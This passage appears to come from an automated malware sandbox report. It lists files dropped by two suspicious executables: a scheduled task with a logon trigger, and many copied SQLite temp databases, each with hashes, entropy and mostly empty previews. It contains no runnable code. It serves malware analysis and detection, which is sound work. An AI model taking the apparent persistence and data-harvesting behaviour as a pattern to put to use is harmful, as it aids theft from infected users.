                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

                      C:\Users\user\AppData\Local\Temp\tmpB48A.tmp

                      Download File
                      Process:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):51200
                      Entropy (8bit):0.8746135976761988
                      Encrypted:false
                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmpB49A.tmp

                      Download File
                      Process:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmpB4AB.tmp

                      Download File
                      Process:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmpB4BC.tmp

                      Download File
                      Process:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmpB4CC.tmp

                      Download File
                      Process:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmpB4DD.tmp

                      Download File
                      Process:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmpB4EE.tmp

                      Download File
                      Process:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmpC583.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):40960
                      Entropy (8bit):0.8553638852307782
                      Encrypted:false
                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                      MD5:28222628A3465C5F0D4B28F70F97F482
                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmpC584.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):40960
                      Entropy (8bit):0.8553638852307782
                      Encrypted:false
                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                      MD5:28222628A3465C5F0D4B28F70F97F482
                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmpC5A4.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmpC5B5.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmpC5D5.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmpD7FD.tmp

                      Download File
                      Process:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):40960
                      Entropy (8bit):0.8553638852307782
                      Encrypted:false
                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                      MD5:28222628A3465C5F0D4B28F70F97F482
                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmpD80E.tmp

                      Download File
                      Process:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):40960
                      Entropy (8bit):0.8553638852307782
                      Encrypted:false
                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                      MD5:28222628A3465C5F0D4B28F70F97F482
                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmpD83E.tmp

                      Download File
                      Process:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):40960
                      Entropy (8bit):0.8553638852307782
                      Encrypted:false
                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                      MD5:28222628A3465C5F0D4B28F70F97F482
                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmpD84E.tmp

                      Download File
                      Process:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):40960
                      Entropy (8bit):0.8553638852307782
                      Encrypted:false
                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                      MD5:28222628A3465C5F0D4B28F70F97F482
                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmpD86F.tmp

                      Download File
                      Process:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):40960
                      Entropy (8bit):0.8553638852307782
                      Encrypted:false
                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                      MD5:28222628A3465C5F0D4B28F70F97F482
                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmpD870.tmp

                      Download File
                      Process:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):40960
                      Entropy (8bit):0.8553638852307782
                      Encrypted:false
                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                      MD5:28222628A3465C5F0D4B28F70F97F482
                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmpDB94.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmpDBA5.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmpDBB5.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmpDBC6.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):98304
                      Entropy (8bit):0.08235737944063153
                      Encrypted:false
                      SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                      MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                      SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                      SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                      SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmpDBD7.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):98304
                      Entropy (8bit):0.08235737944063153
                      Encrypted:false
                      SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                      MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                      SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                      SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                      SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmpEA95.tmp

                      Download File
                      Process:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmpEAA6.tmp

                      Download File
                      Process:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
